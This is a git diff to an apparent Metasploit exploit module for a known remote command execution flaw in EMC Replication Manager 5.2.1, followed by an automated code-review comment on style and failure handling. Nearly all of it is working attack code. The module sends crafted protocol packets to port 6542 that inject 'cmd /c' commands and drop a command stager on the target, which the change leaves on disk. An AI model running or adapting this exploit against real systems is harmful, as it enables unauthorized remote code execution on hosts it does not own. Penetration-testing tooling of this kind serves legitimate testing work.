diff --git a/modules/exploits/windows/emc/replication_manager_exec.rb b/modules/exploits/windows/emc/replication_manager_exec.rb
index 1e956d9ec4a6..832de8b66c8f 100644
--- a/modules/exploits/windows/emc/replication_manager_exec.rb
+++ b/modules/exploits/windows/emc/replication_manager_exec.rb
@@ -36,84 +36,107 @@ def initialize(info = {})
[ 'OSVDB', '70853' ],
[ 'BID', '46235' ],
[ 'URL', 'http://www.securityfocus.com/archive/1/516260' ],
- [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-061/' ],
+ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-061/' ]
],
'DisclosureDate' => 'Feb 07 2011',
'Platform' => 'win',
- 'Arch' => [ ARCH_X86 ],
+ 'Arch' => [ ARCH_X86, ARCH_CMD ],
+ 'Payload' =>
+ {
+ 'Space' => 5000,
+ 'DisableNops' => true
+ },
'Targets' =>
[
- [ 'Automatic', { } ]
+ # Tested on Windows XP and Windows 2003
+ [ 'EMC Replication Manager 5.2.1 / Windows Native Payload',
+ {
+ 'Arch' => ARCH_X86
+ }
+ ],
+ [ 'EMC Replication Manager 5.2.1 / Windows CMD',
+ {
+ 'Arch' => ARCH_CMD
+ }
+ ]
],
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 5
+ },
'DefaultTarget' => 0,
'Privileged' => true,
))
register_options(
[
- Opt::RPORT(6542),
- OptString.new('CMD', [ false, 'Execute this command instead of using command stager']),
+ Opt::RPORT(6542)
], self.class)
end
def exploit
- if datastore['CMD']
- print_status("Executing command '#{datastore['CMD']}'")
- execute_command(datastore['CMD'], {})
- return
- end
+ if target.name =~ /CMD/
+ print_status("Executing payload...")
+ print_status("#{payload.encoded}")
+ execute_command(payload.encoded, {})
+ else # Native target
+ execute_cmdstager({:linemax => 5000, :nodelete => true})
+ end
- execute_cmdstager({:linemax => 5000})
- handler
end
def execute_command(cmd, opts)
connect
hello = "1HELLOEMC00000000000000000000000"
+ vprint_status("Sending hello...")
sock.put(hello)
result = sock.get_once || ''
if result =~ /RAWHELLO/
- print_good("We sent hello and get hello back from the server. Good")
- else
- disconnect
- return
+ vprint_good("Expected hello response")
+ else
+ disconnect
+ fail_with(Failure::Unknown ,"Failed to hello the server")
end
- startsession = "EMC_Len00000001361"
- sock.put(startsession)
+ start_session = "EMC_Len00000001361"
+ vprint_status("Starting session...")
+ sock.put(start_session)
result = sock.get_once || ''
if result =~ /EMC/
- print_good("A session has been created. Good.")
- else
- disconnect
- return
+ vprint_good("A session has been created. Good.")
+ else
+ disconnect
+ fail_with(Failure::Unknown, "Failed to create the session")
end
- runprog = " "
- runprog << "cmd /c #{cmd}"
- runprog << "<?xml version="1.0" encoding="UTF-8"?> <ir_message ir_sessionId="00000" ir_requestId="00000" "
- runprog << "ir_type="App Info" ir_status="0"><IR_groupEntry IR_groupType="anywriter" IR_groupName="CM1109A1" IR_groupId="1" "
- runprog << "><?xml version="1.0" encoding="UTF-8"? > <ir_message ir_sessionId="00000" "
- runprog << "ir_requestId="00000"ir_type="App Info" ir_status="0"><aa_anywriter_ccr_node>CM1109A1"
- runprog << "</aa_anywriter_ccr_node><aa_anywriter_fail_1018>0</aa_anywriter_fail_1018><aa_anywriter_fail_1019>0"
- runprog << "</aa_anywriter_fail_1019><aa_anywriter_fail_1022>0</aa_anywriter_fail_1022><aa_anywriter_runeseutil>1"
- runprog << "</aa_anywriter_runeseutil><aa_anywriter_ccr_role>2</aa_anywriter_ccr_role><aa_anywriter_prescript>"
- runprog << "</aa_anywriter_prescript><aa_anywriter_postscript></aa_anywriter_postscript><aa_anywriter_backuptype>1"
- runprog << "</aa_anywriter_backuptype><aa_anywriter_fail_447>0</aa_anywriter_fail_447><aa_anywriter_fail_448>0"
- runprog << "</aa_anywriter_fail_448><aa_exchange_ignore_all>0</aa_exchange_ignore_all><aa_anywriter_sthread_eseutil>0&"
- runprog << ";lt;/aa_anywriter_sthread_eseutil><aa_anywriter_required_logs>0</aa_anywriter_required_logs><aa_anywriter_required_logs_path"
- runprog << "></aa_anywriter_required_logs_path><aa_anywriter_throttle>1</aa_anywriter_throttle><aa_anywriter_throttle_ios>300"
- runprog << "</aa_anywriter_throttle_ios><aa_anywriter_throttle_dur>1000</aa_anywriter_throttle_dur><aa_backup_username>"
- runprog << "</aa_backup_username><aa_backup_password></aa_backup_password><aa_exchange_checksince>1335208339"
- runprog << "</aa_exchange_checksince> </ir_message></IR_groupEntry> </ir_message>"
- runprog << "anywriterbackup "
- emc6 = "EMC_Len000000";
- runpacket = emc6 + runprog.length.to_s + runprog
- sock.put(runpacket)
+ run_prog = " "
+ run_prog << "cmd /c #{cmd}"
+ run_prog << "<?xml version="1.0" encoding="UTF-8"?> <ir_message ir_sessionId="00000" ir_requestId="00000" "
+ run_prog << "ir_type="App Info" ir_status="0"><IR_groupEntry IR_groupType="anywriter" IR_groupName="CM1109A1" IR_groupId="1" "
+ run_prog << "><?xml version="1.0" encoding="UTF-8"? > <ir_message ir_sessionId="00000" "
+ run_prog << "ir_requestId="00000"ir_type="App Info" ir_status="0"><aa_anywriter_ccr_node>CM1109A1"
+ run_prog << "</aa_anywriter_ccr_node><aa_anywriter_fail_1018>0</aa_anywriter_fail_1018><aa_anywriter_fail_1019>0"
+ run_prog << "</aa_anywriter_fail_1019><aa_anywriter_fail_1022>0</aa_anywriter_fail_1022><aa_anywriter_runeseutil>1"
+ run_prog << "</aa_anywriter_runeseutil><aa_anywriter_ccr_role>2</aa_anywriter_ccr_role><aa_anywriter_prescript>"
+ run_prog << "</aa_anywriter_prescript><aa_anywriter_postscript></aa_anywriter_postscript><aa_anywriter_backuptype>1"
+ run_prog << "</aa_anywriter_backuptype><aa_anywriter_fail_447>0</aa_anywriter_fail_447><aa_anywriter_fail_448>0"
+ run_prog << "</aa_anywriter_fail_448><aa_exchange_ignore_all>0</aa_exchange_ignore_all><aa_anywriter_sthread_eseutil>0&"
+ run_prog << ";lt;/aa_anywriter_sthread_eseutil><aa_anywriter_required_logs>0</aa_anywriter_required_logs><aa_anywriter_required_logs_path"
+ run_prog << "></aa_anywriter_required_logs_path><aa_anywriter_throttle>1</aa_anywriter_throttle><aa_anywriter_throttle_ios>300"
+ run_prog << "</aa_anywriter_throttle_ios><aa_anywriter_throttle_dur>1000</aa_anywriter_throttle_dur><aa_backup_username>"
+ run_prog << "</aa_backup_username><aa_backup_password></aa_backup_password><aa_exchange_checksince>1335208339"
+ run_prog << "</aa_exchange_checksince> </ir_message></IR_groupEntry> </ir_message>"
+ run_prog << "anywriterbackup "
+ run_prog_header = "EMC_Len000000"
+ run_prog_packet = run_prog_header + run_prog.length.to_s + run_prog
+
+ vprint_status("Executing command....")
+ sock.put(run_prog_packet)
Rex.sleep(1) # wait for irccd.exe to write the stager on disk
- endstring = Rex::Text.rand_text_alpha(rand(10)+32)
- sock.put(endstring)
+
+ end_string = Rex::Text.rand_text_alpha(rand(10)+32)
+ sock.put(end_string)
disconnect
end
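Review bot: The new target dispatch in `exploit` keys on the display string, `if target.name =~ /CMD/`, so a later rename of either target would silently send the CMD target down the cmdstager branch; the arch each target declares already carries that distinction, e.g. `if target.arch.include?(ARCH_CMD)`. The two `fail_with` calls added in `execute_command` report `Failure::Unknown` although each condition is specifically a reply that lacks the expected marker, which `Failure::UnexpectedReply` describes more precisely, and the first call has a stray space before the comma (`Failure::Unknown ,`). `print_status("#{payload.encoded}")` interpolates a string into itself and prints the whole encoded payload at normal verbosity, unlike the other new messages which use `vprint_*`; `vprint_status(payload.encoded)` keeps it behind the verbose flag. The new `:nodelete => true` passed to `execute_cmdstager` presumably leaves the dropped stager file behind on the host; a one-line comment stating that, such as `# stager file is left on disk, not removed after execution`, would document the deliberate trade-off.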